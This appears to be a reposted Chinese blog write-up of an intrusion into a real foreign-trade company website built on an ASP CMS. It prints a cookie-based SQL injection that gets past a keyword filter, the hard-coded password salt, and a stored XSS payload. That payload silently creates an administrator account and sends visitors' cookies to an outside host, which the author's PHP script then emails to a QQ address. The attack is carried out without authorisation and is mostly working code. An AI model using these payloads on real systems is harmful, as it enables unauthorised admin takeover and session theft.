首先粗略的看了下网站的整体结构、
发现不是那种5 分钟就能叼下的垃圾企业站。
旁站看了下都是同一个程序做的
C 段我就懒的看了,因为像这种站所在机房你能 ARP 到数据的几率比中国足球队进世界杯还难。
话又说回来了。去年做外贸的时候公司用的貌似就是这套程序,当时只是粗略的看了下这套程序,没看出啥严重的漏洞。
最近公司无事,找以前同事拿来这套程序源码看了下。
发现如下安全问题 New.asp 中 view sourceprint? 01 <!--#include file="top.asp"--> 02 <% 03 page=clng(request("page")) 04 Set rs=Server.CreateObject("ADODB.RecordSet") 05 sql="select * from member_news where type='"&request("type")&"' order by order0 desc" 06 rs.Open sql,conn,1,1 07 if rs.eof and rs.bof then 08 response.Write("No news!") 09 else 10 %> 其中top.asp 中又包含了inc/sql.asp 其内容为: view sourceprint? 01 <% 02 'sql过滤 03 Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr 04 '自定义需要过滤的字串,用"|" 分隔 05 Fy_In = "'|;|[| and | exec | insert | select | delete | update | count |*|%| chr | mid | master | truncate | char | declare " 06 '---------------------------------- 07 Fy_Inf = split(Fy_In,"|") 08 '--------POST部份------------------ 09 If Request.Form<>"" Then 10 For Each Fy_Post In Request.Form 11 For Fy_Xh=0 To Ubound(Fy_Inf) 12 If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then 13 response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>" 14 response.end 15 End If 16 Next 17 Next 18 End If 19 '--------GET部份------------------- 20 If Request.QueryString<>"" Then 21 For Each Fy_Get In Request.QueryString 22 For Fy_Xh=0 To Ubound(Fy_Inf) 23 If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then 24 response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>" 25 response.end 26 End If 27 Next 28 Next 29 End If 30 %> 老兄,你怎么不把cookies放在眼里。 后台登陆部分重要代码admin/login.asp view sourceprint? 1 md5key="pjfmd5" 2 if request("action")="login" then 3 admin_name=trim(request("admin_name")) 4 admin_pass=md5(trim(request("admin_pass"))&md5key) 所以,把注入到的密文拿到cmd5破解: Xxooxxoo:pjfmd5 就是明文了。 于是注入一枚叼到。为了安全起见咱本地先测试下,结果是明亮的。 但是这屌丝把后台改了,用这密码测试了下FTP 邮箱等,木有结果 SO 继续挖。 半小时后,发现inc/modify.asp 如下代码 view sourceprint? 01 if request.Form("submit")<>"" then 02 set rs=server.createobject("adodb.recordset") 03 sql="select * from [user] where User_Name='"&session("user_name")&"'" 04 rs.open sql,conn,1,3 05 if rs.eof and rs.bof then 06 response.write"<SCRIPT>//alert('Sorry,this User_name not exist! Please check it');history.back(-1)</SCRIPT>" 07 response.end() 08 else 09 for i=2 to rs.fields.count-1 10 if rs.fields(i).Name="Password2" then 11 elseif rs.fields(i).Name="Country" then 12 rs(rs.fields(i).Name)=split(countrystr,",")((request.Form(rs.fields(i).Name))) 13 elseif rs.fields(i).Name="Password" and (request.Form(rs.fields(i).Name))<>rs("password") then 14 response.Write "<SCRIPT>//alert('You have Changed the password!');</SCRIPT>" 15 rs(rs.fields(i).Name)=md5((request.Form(rs.fields(i).Name))&md5key) 16 elseif rs.fields(i).Name="sex" then 17 rs(rs.fields(i).Name)=(""<>(request.Form(rs.fields(i).Name))) 18 else 19 rs(rs.fields(i).Name)=(request.Form(rs.fields(i).Name)) 20 end if'save information 21 next 22 rs.update 23 rs.close 24 end if 25 response.Write "<SCRIPT>//alert('Modify success!');location='log.asp'</SCRIPT>" 26 response.End() 27 end if%> 相关没做任何处理直接入库了。也就是说我们可以在表单中插入我们的JS。 好的继续看下后台取数数据部分 /admin/member/6pjf.asp 中 view sourceprint? 1 elseif request("ac")="<SPAN style="FONT-FAMILY: 宋体">会员管理</SPAN><SPAN style="FONT-FAMILY: 'Times New Roman'">" then</SPAN> 2 ............. 3 call rstotable(tcol_tname,where_order,"user",20,temptitle,"6pjfadd.asp","id","yes") 其中函数rstotable
未做任何过滤就取出数据。
测试之 呵呵,笑死
根据相关条件,写了个JS 利用。
添加管理员
记录 cookies 发送到我的 Q 。坐等结果 其中JS代码为: view sourceprint? 01 document.write('Alabama'); 02 var xmlHttp; 03 if(window.ActiveXObject){ 04 xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); 05 } 06 else if(window.XMLHttpRequest) 07 { 08 xmlHttp = new XMLHttpRequest(); 09 } 10 11 function validateForm() { 12 str = window.location.pathname; 13 var strs= new Array(); 14 strs=str.split("/"); 15 x = strs[1]; 16 var url = "/"+ x +"/member/6pjfadd. asp ?ac=%ba%f3%cc%a8%d5%ca%ba%c5%c9%e8%d6%c3"; 17 var params = "admin_name=yezi&admin_pass=fuckyou&admin_alow=%C0%CF%B0%E5&addtime=2012-5-31+4%3A55%3A59&submit=%CC%ED%BC%D3%BC%C7%C2%BC&refer="+ document.referrer; 18 xmlHttp.open("POST", url, true); 19 xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 20 xmlHttp.setRequestHeader("Content-length", params.length); 21 xmlHttp.setRequestHeader("Connection", "close"); 22 xmlHttp.onreadystatechange = function() { 23 if(xmlHttp.readyState == 4 && xmlHttp.status == 200) { 24 //alert(xmlHttp.responseText); 25 } 26 } 27 xmlHttp.send(params); 28 } www.2cto.com 29 validateForm(); 30 (function(){ 31 var a=document.createElement('script'); 32 a.setAttribute('type', 'text/javascript'); 33 a.setAttribute('src', 'http://yezi.us/xss.php?cookie='+document.cookie); 34 document.getElementsByTagName('head').item(0).appendChild(a); 35 36 })() XSS.php 代码为: view sourceprint? 01 <?php 02 date_default_timezone_set('Asia/Shanghai'); 03 $a=@$_GET['cookie']; 04 $ref=$_SERVER['HTTP_REFERER']; 05 $data=$a."---cookie"."\r\n".$ref."---referer"."\r\n"; 06 $to='5078****@qq.com'; 07 $subject = 'You have something From : '.$ref; 08 $body="\n-------URL= ".$ref."\n-------Time = " .date("Y-m-d H:i:s")."\n-------Data = ".$data."\n----------------------------------------------"; 09 $headers= 'MIME-Version: 1.0' . "\r\n"; 10 $headers.= 'Content-type: text/ html ; charset=utf-8' . "\r\n"; 11 $headers.="Here Come Some Password"; 12 if(!empty($a)){ 13 $sendmail = @mail($to, $subject, $body, $headers); 14 if(!$sendmail){ 15 @$file = fopen('xsstest.txt' , 'a+'); 16 @$write = fwrite($file,$a.$ref.$data."\r\n"); 17 @fclose($file); 18 } 19 }else{ 20 echo "Hey , man ,What r u doing ? "; 21 } 22 ?> 摘自 yezi.us
查看更多关于对某非主流外贸网站的渗透测试 - 网站安全 - 自的详细内容...